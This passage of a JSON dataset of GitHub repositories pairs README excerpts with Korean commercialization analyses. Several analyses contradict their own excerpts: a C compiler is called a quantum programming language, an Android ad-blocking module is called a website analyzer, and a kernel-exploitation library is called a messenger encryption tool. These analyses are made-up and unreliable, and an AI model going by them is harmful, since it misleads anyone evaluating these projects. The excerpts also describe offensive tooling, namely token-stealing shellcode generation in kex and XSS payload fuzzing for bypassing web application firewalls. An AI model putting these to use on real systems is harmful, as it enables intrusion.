CFB\n - OFB\n\n## Usage:\n```\npython ./crypto_identifier.py --help\nusage: crypto_identifier.py [-h] --input INPUT [--key KEY] [--keys KEYS]\n                            [--printable] [--grep GREP]\n                            [--algo {ARC4,CAST,AES,XOR,ARC2,DES,Blowfish,DES3}]\n                            [--mode {ECB,CBC,CFB,OFB}]\n\noptional arguments:\n  -h, --help            show this help message and exit\n  --input INPUT, -i INPUT\n                        input string (base64)\n  --key KEY, -k KEY     key string\n  --keys KEYS, -ks KEYS\n                        keys file\n  --printable, -p       display only printable results\n  --grep GREP, -g GREP  grep string in results\n  --algo","composite_score":0.3011,"license_safety_tag":"unknown"},{"name":"w568w/fuckView","github_url":"https://github.com/w568w/fuckView","stars":6,"language":"Java","license":"AGPL-3.0","abandonment_months":51,"description":"# fuckView 저장소 분석\n\n## 왜 보물인가\n웹사이트의 화면 구성 요소를 자동으로 감지하고 분석하는 도구로, 웹 개발 작업을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹 디자인 회사의 자동화 도구**: 클라이언트 웹사이트 검수 및 레이아웃 분석을 자동으로 처리하여 작업 시간 50% 단축\n2. **웹 접근성 검사 서비스**: 장애","readme_excerpt":"# fuckView\n\n![FUCKVIEW](icon.png)\n\n[![Build Status](https://travis-ci.org/w568w/fuckView.svg?branch=master)](https://travis-ci.org/w568w/fuckView)  \n\n---\n\nA Xposed module that can block anything you want in any app, just like a super AdBlocker for Android applications.\nIt's experimental and **has piles of bugs**, which I am working hard to fix now.\nYou are able to get the lastest (**often very beta!**) apk file built by the continuous integration at [here](http://d.7short.com/fuckview).\n  \nYou can also download the stable apk from  \n[Github releases](https://github.com/w568w/fuckView/releases)  \n[Xposed Repo](http://repo.xposed.info/module/ml.qingsu.fuckview)\n\n## License\n\n```GNU AFFERO GENERAL PUBLIC LICENSE v3```\n\n# 净眼\n\n---\n\n这是一个可以让你在任何应用中屏蔽任何你不想看到东西的 Xposed 模块，就像加强版 AdBlocker。  \n它处在实验性阶段，**BUG 灰常多**。但我正在优化。  \n你可以从[这儿](http://d.7short.com/fuckview)获得与最新提交实时跟进的 APK 包(通常**不是很稳定**)。\n  \n或者你也可以从这些地方获得较稳定的版本:  \n[Github 发布](https://github.com/w568w/fuckView/releases)  \n[Xposed 官方库](http://re","composite_score":0.3011,"license_safety_tag":"risky"},{"name":"Yasic/DynamicClipImage","github_url":"https://github.com/Yasic/DynamicClipImage","stars":9,"language":"Objective-C","license":"unknown","abandonment_months":103,"description":"# DynamicClipImage 상용화 분석\n\n## 왜 보물인가\n복잡한 이미지 편집 작업을 자동으로 처리해주는 기술로, 사진 관리 앱이나 디자인 도구에 필수적인 기능입니다.\n\n## 어디에 쓸 수 있나\n1. **사진 편집 SaaS**: 스마트폰 사용자가 복잡한 선택 없이 원클릭으로 이미지를 자르고 정리할 수 있는 모바일 앱\n2. **마케팅 대행사 내부 도구","readme_excerpt":"# iOS实现动态区域裁剪图片\n\n裁剪图片功能在很多上传图片的场景里都需要用到，一方面应用服务器可能对图片的尺寸大小有限制，因而希望上传的图片都是符合规定的，另一方面，用户可能希望只上传图片中的部分内容，突出图片中关键的信息。而为了满足用户多种多样的裁剪需求，就需要裁剪图片时能支持由用户动态地改变裁剪范围、裁剪尺寸等。\n\n首先看一下效果图\n\n<img src=\"https://github.com/Yasic/DynamicClipImage/blob/master/Screenshot/demo.gif?raw=true\" width=270 height=480>\n\n[源代码仓库](https://github.com/Yasic/DynamicClipImage)\n\n动态裁剪图片的基本过程大致可以分为以下几步\n\n* 显示图片与裁剪区域\n* 支持移动和缩放图片\n* 支持手势改变裁剪区域\n* 进行图片裁剪并获得裁剪后的图片\n\n## 显示图片与裁剪区域\n\n### 显示图片\n\n在裁剪图片之前，首先我们要在页面上显示待裁剪的图片，如下图所示\n\n<img src=\"https://github.com/Yasic/DynamicClipImage/blob/master/Screenshot/image-20171129.png?raw=false\" height=500>\n\n这一步比较简单，配置一个 UIImageView 来放置图片即可。但是要注意一点，UIImageView 有多种 contentMode，最常见有三种\n\n* UIViewContentModeScaleToFill\n* UIViewContentModeScaleAspectFit\n* UIViewContentModeScaleAspectFill\n\n三者区别可以看下面的比较\n\n* UIViewContentModeScaleToFill\n\n<img src=\"https://github.com/Yasic/DynamicClipImage/blob/master/Screenshot/ScaleToFill.png?raw=false\" height=500>\n\n* UIViewContentModeScaleAspectFit\n\n<img src=\"https://github.com/Ya","composite_score":0.301,"license_safety_tag":"unknown"},{"name":"PatrolServer/bashscanner","github_url":"https://github.com/PatrolServer/bashscanner","stars":22,"language":"Shell","license":"unknown","abandonment_months":25,"description":"# PatrolServer/bashscanner 사업화 분석\n\n## 왜 보물인가\n서버 보안 문제를 자동으로 찾아주는 도구로, 기업들이 해킹으로부터 시스템을 지키는 데 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업 대상 \"월 구독형 서버 보안 검사 서비스\"로 운영 (자동 스캔 + 월간 리포트)\n2. **내부 업무 도","readme_excerpt":"# Bash Scanner\n<a target=\"_blank\" href=\"http://opensource.org/licenses/GPL-3.0\"><img alt=\"GPL v3\" src=\"https://camo.githubusercontent.com/7aa49bcd4f4eb9a53e06b1607e5b9c5709c5d118/68747470733a2f2f706f7365722e707567782e6f72672f6c6561726e696e676c6f636b65722f6c6561726e696e676c6f636b65722f6c6963656e73652e737667\"></img></a>\n\nBash Scanner is a fast and reliable way to scan your server for outdated software and potential exploits.\n\n![PatrolServer Bash Scanner](http://i.imgur.com/O4fu9Nk.png)\n\n## Getting started\n### Install\nThe easiest way to install the Bash Scanner tool is by using `wget` to get the runnable shell script. This file is signed with a SHA 256 key and allows you to safely install the security monitor by following several simple steps.\n```\nwget https://raw.githubusercontent.com/PatrolServer/bash-scanner/master/patrolserver\n```\nIn order to run the monitor tool, use the `bash` command to execute the shell script downloaded before.\n```\nbash patrolserver\n```\n\n### Extended reports\nAfte","composite_score":0.301,"license_safety_tag":"unknown"},{"name":"theevilbit/kex","github_url":"https://github.com/theevilbit/kex","stars":5,"language":"Python","license":"mit","abandonment_months":83,"description":"# theevilbit/kex 상품화 분석\n\n## 왜 보물인가\n암호화와 보안 기술을 쉽게 다룰 수 있는 도구로, 개인정보 보호가 중요한 모든 디지털 서비스에서 필수적으로 사용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **메시지 앱 SaaS**: 사용자 간 채팅 내용을 자동으로 암호화하여 전송하는 보안 메신저 서비스\n2. **클라우드 저장소 API**","readme_excerpt":"# How to use the kex library\n## Dependencies:\nNone, it only uses default Python system libraries, and this won’t change in the future, I want to keep it package independent. It works with Python 2.7.x, and wasn’t tested with 3.x.\n\n## Sources\nIf I used a function I found somewhere, I tried to point this out in the comments. Specifically the GDI bitmap abuse ones are taken from: [GitHub - GradiusX/HEVD-Python-Solutions: Python solutions for the HackSysTeam Extreme Vulnerable Driver](https://github.com/GradiusX/HEVD-Python-Solutions). Although I modified them them in some cases, still the majority is unchanged, and as they build up big part of the code base, I wanted to highlight it here. PALETTE r/w primitives are my own creation.\n\n## Basic usage\n### Functions to generate shell codes\n\nThese will get specific OS structure offsets:\n```\ndef getosvariablesx():\ndef getosvariablesx86():\ndef getosvariablesx64():\n```\n\nThese will create token stealing shell code for the recognised platform.\n```\nd","composite_score":0.301,"license_safety_tag":"safe"},{"name":"r26zhao/django_blog","github_url":"https://github.com/r26zhao/django_blog","stars":8,"language":"Python","license":"mit","abandonment_months":42,"description":"# Django Blog 저장소 분석\n\n## 왜 보물인가\n누구나 쉽게 자신의 블로그 웹사이트를 만들고 운영할 수 있는 완성된 기본 틀을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **블로그 호스팅 SaaS**: 개인 블로거들이 월 구독료로 자신의 블로그를 쉽게 개설하고 관리할 수 있는 서비스\n2. **기업 블로그 내부 도구**: 회사 뉴스레터나 기술 블로","readme_excerpt":"# django_blog","composite_score":0.301,"license_safety_tag":"safe"},{"name":"yacy/yacy_grid_crawler","github_url":"https://github.com/yacy/yacy_grid_crawler","stars":11,"language":"Java","license":"unknown","abandonment_months":42,"description":"# YaCy Grid Crawler 상용화 분석\n\n## 왜 보물인가\n인터넷 전체를 자동으로 수집하고 정리해주는 '개인용 검색엔진'을 누구나 만들 수 있게 해주는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업들이 경쟁사 웹사이트를 자동으로 모니터링하고 가격·상품 변화를 추적하는 '시장조사 자동화 플랫폼'\n2. **내부 업무 도구","readme_excerpt":"# YaCy Grid Component: Crawler\n\nThe YaCy Grid is the second-generation implementation of YaCy, a peer-to-peer search engine.\nA YaCy Grid installation consists of a set of micro-services which communicate with each other\nusing the MCP, see https://github.com/yacy/yacy_grid_mcp\n\n## Purpose\n\nThe Crawler is a microservices which can be deployed i.e. using Docker. When the Crawler Component\nis started, it searches for a MCP and connect to it. By default the local host is searched for a\nMCP but you can configure one yourself.\n\n## What it does\n\nThe Crawler then does the following:\n\n```\nwhile (a Crawl Contract is in the queue crawler_pending) do\n   - read the target url from the contract\n   - check against the search index if the url is registered in the transaction index as 'to-be-parsed'. If not, continue\n   - load the url content from the assets (it must have been loaded before! - that is another process)\n   - parse the content and create a YaCy JSON object with that content\n   - place the ","composite_score":0.301,"license_safety_tag":"unknown"},{"name":"TheSwiftAlps/SwiftARlps","github_url":"https://github.com/TheSwiftAlps/SwiftARlps","stars":6,"language":"Swift","license":"unknown","abandonment_months":103,"description":"# SwiftARlps 분석\n\n## 왜 보물인가\n증강현실(AR) 기술을 애플의 Swift 프로그래밍 언어로 구현한 도구로, iOS 앱 개발자들이 쉽게 AR 기능을 추가할 수 있게 만들었습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: AR 기반 실시간 가구 배치 시뮬레이션 서비스 (사용자가 방에 가구를 놓기 전에 미리 볼 수 있음)\n2. *","readme_excerpt":"[![BuddyBuild](https://dashboard.buddybuild.com/api/statusImage?appID=5a13e4c292ae680001a82664&branch=master&build=latest)](https://dashboard.buddybuild.com/apps/5a13e4c292ae680001a82664/build/latest?branch=master)\n\n## 🏃‍♀️ Getting started\n\n* Open `SwiftARlps.xcodeproj`.\n* Select a development team in the project settings.\n* Build and run on your device.\n\nPoint your camera at a surface, wait until it detects a surface and then press\none of the buttons to place an object.\n\n## Process\n\n* 👩‍👦 Pair up with another attendee.\n* 🍴 Fork the repository, and optionally create a branch.\n* 💡 Think of a feature to add, you can come up with something yourself or\n  choose from the [Issues](https://github.com/TheSwiftAlps/SwiftARlps/issues).\n* 🎯 Commit and push your work, and create a\n  [Pull Request](https://github.com/TheSwiftAlps/SwiftARlps/pulls).\n\n## 🦉 Tips\n\n* Start by looking at the FileDescriptions.md file for a description of what\n  files have which responsibility.\n* Choose a simple feature to","composite_score":0.301,"license_safety_tag":"unknown"},{"name":"fossasia/opendesign.asia","github_url":"https://github.com/fossasia/opendesign.asia","stars":12,"language":"HTML","license":"unknown","abandonment_months":68,"description":"# OpenDesign.Asia 저장소 분석\n\n## 왜 보물인가\n아시아 지역의 디자인 자산과 리소스를 한 곳에 모아 누구나 자유롭게 사용할 수 있는 오픈소스 디자인 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 아시아 문화 기반 디자인 템플릿을 제공하는 온라인 디자인 도구 플랫폼\n2. **내부 업무 도구**: 기업의 마케팅팀이 ","readme_excerpt":"# opendesign.asia\nWebsite for OpenDesign.Asia \n","composite_score":0.3009,"license_safety_tag":"unknown"},{"name":"NytroRST/XSSFuzzer","github_url":"https://github.com/NytroRST/XSSFuzzer","stars":5,"language":"HTML","license":"unknown","abandonment_months":89,"description":"# XSSFuzzer 보물 분석 보고서\n\n## 왜 보물인가\n웹사이트의 보안 취약점을 자동으로 찾아내는 도구로, 기업의 보안 사고를 미리 예방할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 진단 SaaS**: 중소 기업들이 자신의 웹사이트 보안을 월 구독으로 자동 점검받는 서비스\n2. **웹 개발사 내부 도구**: 개발 완료 후 배포 전 자동으로 ","readme_excerpt":"# XSS Fuzzer\n\nXSS Fuzzer is a simple application written in plain HTML/JavaScript/CSS which generates XSS payloads based on user-defined vectors using multiple placeholders which are replaced with fuzzing lists.\n\nIt offers the possibility to just generate the payloads as plain-text or to execute them inside an iframe. Inside iframes, it is possible to send GET or POST requests from the browser to arbitrary URLs using generated payloads.\n\n# Why? \n\nXSS Fuzzer is a generic tool that can be useful for multiple purposes, including:\n\n* Finding new XSS vectors, for any browser\n* Testing XSS payloads on GET and POST parameters\n* Bypassing XSS Auditors in the browser\n* Bypassing web application firewalls\n* Exploiting HTML whitelist features\n\n# Example\n\nIn order to fuzz, it is required to create placeholders, for example:\n\n* The [TAG] placeholder with fuzzing list: img svg.\n* The [EVENT] placeholder with fuzzing list: onerror onload.\n* The [ATTR] placeholder with fuzzing list: src value.\n* The p","composite_score":0.3009,"license_safety_tag":"unknown"},{"name":"facebesidewyj/takeaway_demo","github_url":"https://github.com/facebesidewyj/takeaway_demo","stars":7,"language":"Vue","license":"unknown","abandonment_months":96,"description":"# takeaway_demo 사업화 분석\n\n## 왜 보물인가\n음식 배달 앱 구현을 위한 완성된 기술 기반으로, 배달 서비스를 빠르게 시작하고 싶은 사업가들이 처음부터 개발할 필요 없이 즉시 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **배달 앱 SaaS 서비스**: 소규모 음식점들이 월 구독으로 이용하는 자체 배달 시스템 제공\n2. **프랜차이즈","readme_excerpt":"# 仿饿了么外卖平台\n\n后端转前端，入坑Vue，使用Vue2.0开发了一个高仿饿了么的商家模块来练手，现在把这个Demo开源出来，希望入坑前端的同学可以一起学习，一起进步。\n\n> 有问题可以在Issues里提，大家一起讨论。\n\n## 项目安装步骤\n\n1. git clone 到本地\n2. npm install 安装依赖\n3. npm run dev 启动本地服务\n4. npm run build 项目打包\n\n## 用到的技术栈\n\n1. Vue相关：Vue2.0、vue-cli、vue-router。\n2. 构建工具：Webpack。\n3. 代码风格规范工具：ESLint。\n4. JavaScript语法标准：ECMAScript 2015。\n5. CSS预处理：Stylus。\n6. 移动端滚动插件：better-scroll。\n7. 数据获取：axios。\n\n## 实现的组件\n\n1. 商家列表header组件\n2. 商家商品列表组件\n3. 评价star组件\n4. 可伸缩使用flex布局的直线组件\n5. 购物车组件\n6. 购物车添加组件\n7. 商品详情组件\n8. 分隔块组件\n9. 评论选择组件\n10. 商家组件\n11. 活动图标组件\n\n## 项目截图\n\n<img src=\"https://github.com/facebesidewyj/takeaway_demo/blob/master/resource/photo/Screenshot_20171129-140904.png\" width=\"40%\"/>&nbsp;&nbsp;&nbsp;&nbsp;\n<img src=\"https://github.com/facebesidewyj/takeaway_demo/blob/master/resource/photo/Screenshot_20171129-140912.png\" width=\"40%\"/>\n","composite_score":0.3009,"license_safety_tag":"unknown"},{"name":"nlsandler/nqcc","github_url":"https://github.com/nlsandler/nqcc","stars":9,"language":"OCaml","license":"mit","abandonment_months":47,"description":"# nqcc 저장소 분석\n\n## 왜 보물인가\n양자 컴퓨터를 위한 프로그래밍 언어로, 아직 소수만 다루는 미래 기술 분야의 실무 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **양자컴퓨팅 교육 플랫폼 SaaS**: 대학원·연구소·기업 교육팀에 양자 프로그래밍 학습 환경을 월 구독으로 제공\n2. **기업 연구소 내부 도구**: 반도체·금융·제약사의 R&D 팀","readme_excerpt":"# NQCC - a not-quite-C compiler\n\n**This repo is no longer active. I'm working on a new version of NQCC - I'll link to it here once it's released!**\n\nA compiler for a tiny (but growing!) subset of C, written in OCaml.\n\n## Requirements\n* Install OCaml and OPAM\n* Configure OPAM\n````\nopam init\n````\n\n* Install dependencies:\n```\nopam install oasis\nopam install batteries\nopam install ounit # only needed for tests\n````\n\n## Usage\n* Build it\n```\nmake\n````\n\n* To run it, invoke the `nqcc` script in the project root\n```\n./nqcc /path/to/source.c\n```\nThe compiled executable will be in the same directory as the source file, and have the same name (e.g. `source` in the example above).\n\n## Tests\n```\nocaml setup.ml -configure --enable-tests # you only need to run this once\nmake test # run unit tests\n./test_examples.sh # compile sample programs\n````\n\nYou can also test against [this test suite](https://github.com/nlsandler/write_a_c_compiler).\n","composite_score":0.3009,"license_safety_tag":"safe"},{"name":"kylemcdonald/Coloring-t-SNE","github_url":"https://github.com/kylemcdonald/Coloring-t-SNE","stars":5,"language":"Jupyter Notebook","license":"unknown","abandonment_months":111,"description":"# Coloring-t-SNE 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터를 알록달록한 그림으로 변환해서 한눈에 패턴을 찾을 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **데이터 분석 SaaS**: 기업 데이터를 시각화해주는 웹 서비스로 운영\n2. **의료 진단 도구**: 의료 이미지나 환자 데이터를 색깔별로 분류해 의사 의사결정 지원\n3. *","readme_excerpt":"\n# Coloring t-SNE\n\n[t-SNE](https://lvdmaaten.github.io/tsne/) is great at capturing a combination of the local and global structure of a dataset in 2d or 3d. But when plotting points in 2d, there are often interesting patterns in the data that only come out as \"texture\" in the point cloud. When the plot is colored appropriately, these patterns can be made more clear.\n\n\n```python\n%matplotlib inline\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import MiniBatchKMeans\nfrom sklearn.decomposition import IncrementalPCA, FastICA\nfrom sklearn.neighbors import NearestNeighbors\nfrom scipy.spatial.distance import euclidean\nimport numpy as np\n```\n\nFirst we load some data: a 128 dimensional embedding output from a VAE, and a 2 dimensional representation of those vectors based on running t-SNE.\n\n\n```python\n%time data128 = np.load('data128.npy')\nprint data128.shape\n%time data2 = np.load('data2.npy')\nprint data2.shape\n```\n\n    CPU times: user 528 µs, sys: 353 ms, total: 354 ms\n    Wall time: 48","composite_score":0.3009,"license_safety_tag":"unknown"},{"name":"gajus/react-aux","github_url":"https://github.com/gajus/react-aux","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":103,"description":"# react-aux 상품화 분석\n\n## 왜 보물인가\n웹사이트 개발을 더 쉽고 빠르게 만들어주는 작은 유틸리티로, 개발자들의 반복적인 작업을 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹 기반 업무 관리 도구나 협업 플랫폼 개발 시 UI 구성을 빠르게 처리\n- **내부 업무 도구**: 회사 직원들이 사용하는 관리 시스템을 ","readme_excerpt":"# react-aux\n\n[![NPM version](http://img.shields.io/npm/v/react-aux.svg?style=flat-square)](https://www.npmjs.org/package/react-aux)\n[![Twitter Follow](https://img.shields.io/twitter/follow/kuizinas.svg?style=social&label=Follow)](https://twitter.com/kuizinas)\n\nA self-eradicating component for rendering multiple elements.\n\n## If you are using React 16.2 or higher\n\nReact 16.2 [includes support for a new `React.Fragment` API](https://reactjs.org/blog/2017/11/28/react-v16.2.0-fragment-support.html) which works very similar to this library. If you don't know which one to pick, we recommend the version provided by React. This library mostly exists for those who can't upgrade to React 16.2 yet.\n\n## Motivation\n\nPrior to React v16, returning multiple elements from a component required to wrap them in an auxiliary element, e.g.\n\n```js\nconst Root = () => {\n  return <div>\n    <p>Hello, World!</p>\n    <p>I am a demo for react-aux.</p>\n  </div>;\n};\n\n```\n\nThe latter produces the following DOM:\n\n```ht","composite_score":0.3009,"license_safety_tag":"unknown"},{"name":"sorrycc/zaobao","github_url":"https://github.com/sorrycc/zaobao","stars":9,"language":"","license":"unknown","abandonment_months":103,"description":"# sorrycc/zaobao 상용화 분석\n\n## 왜 보물인가\n최신 뉴스와 정보를 자동으로 수집하고 정리해주는 도구로, 바쁜 현대인들이 매일 필요한 정보를 효율적으로 습득할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독료를 받고 업계별 뉴스를 자동으로 요약해 이메일로 배송하는 뉴스레터 플랫폼\n- **내부 업무 도구**:","readme_excerpt":"# zaobao\n\n---\n\n","composite_score":0.3009,"license_safety_tag":"unknown"},{"name":"kfkme/kfkdock","github_url":"https://github.com/kfkme/kfkdock","stars":8,"language":"Dockerfile","license":"unknown","abandonment_months":58,"description":"# kfkme/kfkdock 평가 분석\n\n## 왜 보물인가\n도커(Docker) 기반의 가볍고 빠른 개발 환경 구축 도구로, 개발자들이 복잡한 설정 없이 즉시 작업을 시작할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사별 맞춤형 개발 환경을 자동으로 생성해주는 클라우드 IDE 플랫폼\n2. **내부 업무 도구**: 신입 개","readme_excerpt":"\n# 使用 Docker 搭建 PHP 开发环境 \nPHP（5.6/7.2/7.4）/ MySQL  / Nginx / Redis\n\n\n \n 视频教程：\n [视频教程](https://www.bilibili.com/video/av13901414/)\n\n\n目录结构：\n```\nbuild       应用\ndata        数据库数据存放路径（mysql,redis）\ndoc         文档\nwww         项目目录\nlogs        日志存放路径（mysql,nginx,php）\nshell       常用shell存放路径\nvhost       虚拟主机配置\nwww         项目目录\ndocker-compose.yml      docker-compose配置文件\nenv-example             存储一些依赖环境的变量的文件\n```\n\n## 快速开始\n\n###### 1. 安装必要的工具\nMac  \n[安装Docker、安装docker-compose、配置Docker加速器](https://github.com/kfkme/kfkdock/blob/master/build/other/README_DEPEND_MAC.md)  \n\nLinux ubuntu  \n[安装Docker、安装docker-compose、配置Docker加速器](https://github.com/kfkme/kfkdock/blob/master/build/other/README_DEPEND_LINUX_UBUNTU.md)\n\n\n###### 2. 下载k-docker-lnmp源码 构建容器\n```\n#进入用户目录\ncd ~/\n\n#下载源码\ngit clone https://github.com/kfkme/k-docker-lnmp.git\n\n#进入目录\ncd kfkdock\n\n#拷贝 配置环境变量文件\ncp env-example .env\n\n#运行你所需要的容器（也可以全部运行 sudo docker-compose up -d）\nsudo docker-compose up -d nginx mysql php\n```\n###### 3. 测试PHP代码\n\n```\n# 启动容器\ncd ~/k-","composite_score":0.3009,"license_safety_tag":"unknown"},{"name":"moskomule/pytorch.rl.learning","github_url":"https://github.com/moskomule/pytorch.rl.learning","stars":27,"language":"Python","license":"unknown","abandonment_months":81,"description":"# pytorch.rl.learning 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 스스로 경험을 통해 최적의 행동을 배우는 '강화학습' 기술을 실제로 구현하고 학습할 수 있는 교육용 코드 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **게임 AI 훈련 SaaS**: 게임사에 NPC 자동 학습 기능을 API로 제공하는 클라우드 서비스\n2. **로봇 제어 솔루션","readme_excerpt":"This repository is for learning *reinforcement learning* using PyTorch.\n# how to use\n\nSet this root dir as `PYTHONPATH`.\n\n```\nexport PYTHONPATH=$(pwd)\n```\n\n# Contents\n## predl\n\n[predl](./predl) contains some algorithms without Deep Learning. Here, PyTorch is just numpy-alternative.\n* [lookup table](./predl/table)\n    + Q-Learning\n    + SARSA\n        - n-step SARSA\n        - SARSA(λ)\n    + DynaQ (Model Free Approach)\n\n* [function approximation](./predl/function_approximation)\n    + Q-learning\n    + SARSA\n* [policy gradient](./predl/policy_gradient)\n    + REINFORCE\n    + REINFORCE with baseline\n    + actor-critic\n\n## dl\n\n[dl](./dl) contains some algorithms using DL.\n* [Deep Q-Network](./dl/dqn)\n    ```\n    cd dl/dqn\n    python exec.py [--env Pong ...] # `python exec.py -h` for help\n    ---\n    tensorboard log_dir runs\n    ```\n\n# Dependencies\n\n* [gym](https://gym.openai.com/)\n    + `gym` requires a lot depends on your environment thus read the official document before using pip.\n* [PyTorc","composite_score":0.3009,"license_safety_tag":"unknown"},{"name":"Minecodecraft/50DaysOfSwift","github_url":"https://github.com/Minecodecraft/50DaysOfSwift","stars":13,"language":"Swift","license":"mit","abandonment_months":103,"description":"# 50DaysOfSwift 상용화 분석\n\n## 왜 보물인가\niPhone이나 iPad 앱을 만들고 싶은 사람들을 위해 50일간 단계적으로 배우는 교육 프로그램으로, 초보자 친화적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초보자 대상 iOS 개발 강좌 패키지로 월 구독료 받기\n2. **기업 직원 교육 서비스**: ","readme_excerpt":"# 50DaysOfSwift\n\nOne demo a day, keep coding for 50 days with Swift. The struggle of a growing iOS developer\n\n\n----\n\n\n# Project GIFs Showcase\n\n## Day 7 - PopUp & FadeOut\n```\nPoint: Animation, Block, Pop-up View\n```\n![Day 7 - PopUp & FadeOut](https://github.com/Minecodecraft/50DaysOfSwift/blob/master/Day%207%20-%20PopUp%26FadeOut/PopUp%26FadeOut.gif)\n\n<br></br>\n\n## Day 6 - Movable Collection View\n```\nPoint: Collection View, UICollectionViewDelegate，lazy，enum、Storyboard\n```\n![Day 6 - Movable Collection View](https://github.com/Minecodecraft/50DaysOfSwift/blob/master/Day%206%20-%20MovableCollectionView/MovableCollectionView.gif)\n\n<br></br>\n\n## Day 5 - Channel Bar\n```\nPoint: ScrollView, Protocol, CollectionView, MVC, extension/ convience, Delegate, StoryBoard\n```\n![Day 5 - Channel Bar](https://github.com/Minecodecraft/50DaysOfSwift/blob/master/Day%205%20-%20ChannelBar/ChannelBar.gif)\n\n<br></br>\n\n## Day 3 - Show My Location\n```\nPoint: CoreLocation, VisualBlurEffect\n```\n![Day 3 - Show My Loc","composite_score":0.3009,"license_safety_tag":"safe"},{"name":"iwasaki-kenta/keita","github_url":"https://github.com/iwasaki-kenta/keita","stars":23,"language":"Python","license":"unknown","abandonment_months":107,"description":"# keita 저장소 분석\n\n## 왜 보물인가\n2017년 마지막 업데이트 이후 관리되지 않는 프로젝트로, 현재 실용성이 매우 낮습니다.\n\n## 어디에 쓸 수 있나\n**1. 내부 업무 도구**\n레거시 시스템 유지보수나 특정 부서의 오래된 프로세스 자동화에 참고용으로 활용 가능합니다.\n\n**2. 교육 자료**\n오픈소스 프로젝트 구조 학습이나 프로그래밍 입문자의","readme_excerpt":"# Keita: A PyTorch Toolkit\n\n## Description\n\nA couple of PyTorch utilities, dataset loaders, and layers suitable for natural language processing, computer vision, meta-learning, etc. which I'm opening out to the community.\n\nI cannot guarantee fixing potential bugs you may find whatsoever; though if you'd like to report any then feel free to file an issue/pull request and I'll try my luck on it. Feedback and suggestions are definitely appreciated!\n\nIn terms of code organization, I would like to clarify that I myself am not a fan of using huge repositories of highly un-maintained, dependant code and thus intend to keep this repository as modular as possible. Hence, for all modules you wish to use in your project, copy-pasting the module alongside a few utility methods should be all that you need to do to get it incorporated into your project.\n\nI intend to make the code as clean and well-documented as possible by keeping the code style consistent and developer-friendly (clear variable name","composite_score":0.3009,"license_safety_tag":"unknown"},{"name":"iwheelbuy/SquareMosaicLayout","github_url":"https://github.com/iwheelbuy/SquareMosaicLayout","stars":5,"language":"Swift","license":"mit","abandonment_months":87,"description":"# SquareMosaicLayout 분석\n\n## 왜 보물인가\n사진이나 이미지를 아름답게 정렬해서 보여주는 기능으로, 인스타그램이나 핀터레스트 같은 시각적 앱을 만들 때 핵심이 되는 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS**: 사진 공유 서비스나 포트폴리오 플랫폼에서 사용자 갤러리 기능 제공\n- **내부 업무 도구**: 회사 자산 관리 시스","readme_excerpt":"# SquareMosaicLayout\n\n[![Version](https://img.shields.io/cocoapods/v/SquareMosaicLayout.svg?style=flat)](https://cocoapods.org/pods/SquareMosaicLayout)\n[![License](https://img.shields.io/cocoapods/l/SquareMosaicLayout.svg?style=flat)](https://raw.githubusercontent.com/iwheelbuy/SquareMosaicLayout/master/LICENSE)\n![Platform](https://img.shields.io/cocoapods/p/SquareMosaicLayout.svg?style=flat)\n\nAn extandable mosaic UICollectionViewLayout with a focus on extremely flexible customizations.\n\n## Note\n\nThis layout is not of [waterfall](https://www.raywenderlich.com/107439/uicollectionview-custom-layout-tutorial-pinterest) type. It was designed for layouts where we can predict the size of rectangular box which contains the number of full cells. Check out how to copy [TRMosaicLayout](https://github.com/iwheelbuy/SquareMosaicLayout#example---copying-trmosaiclayout) or [FMMosaicLayout](https://github.com/iwheelbuy/SquareMosaicLayout#example---copying-fmmosaiclayout) using __SquareMosaicLayout__\n","composite_score":0.3008,"license_safety_tag":"safe"},{"name":"fossasia/phimpme-drupal","github_url":"https://github.com/fossasia/phimpme-drupal","stars":11,"language":"PHP","license":"unknown","abandonment_months":108,"description":"# fossasia/phimpme-drupal 평가\n\n## 왜 보물인가\n드루팔이라는 대규모 웹사이트 구축 플랫폼을 활용해 사진 관리 기능을 추가하는 오픈소스 프로젝트로, 웹사이트에 전문적인 이미지 관리 시스템을 쉽게 더할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 사진 공유 커뮤니티 플랫폼 - 사용자들이 사진을 업로드하고 정렬하","readme_excerpt":"drupal\n======\n\nphimpme drupal prototype modules and theme","composite_score":0.3008,"license_safety_tag":"unknown"},{"name":"licoffe/POE-sniper","github_url":"https://github.com/licoffe/POE-sniper","stars":5,"language":"JavaScript","license":"NOASSERTION","abandonment_months":99,"description":"# POE-sniper 보물 분석\n\n## 왜 보물인가\n경로 오브 엑자일(게임)에서 자동으로 좋은 아이템을 찾아주는 도구로, 게이머들이 수동으로 하던 반복적인 작업을 자동화합니다.\n\n## 어디에 쓸 수 있나\n- **게임 보조 SaaS**: 경로 오브 엑자일 플레이어를 위한 월 구독형 아이템 스캔 서비스\n- **게임 커뮤니티 도구**: 게임 길드/클랜용 공유 ","readme_excerpt":"### Releases\n\n__IMPORTANT!__ poe-rates.com has been added to the whitelisted domains, I therefore have to stop serving whole API chunks through websockets since this goes against the whitelisting idea. Since this is the current way Poe-sniper is working, this also means that I have to retire poe-sniper, at least temporarly, until I use the same serving method used on poe-rates :: live. In the mean time, please use 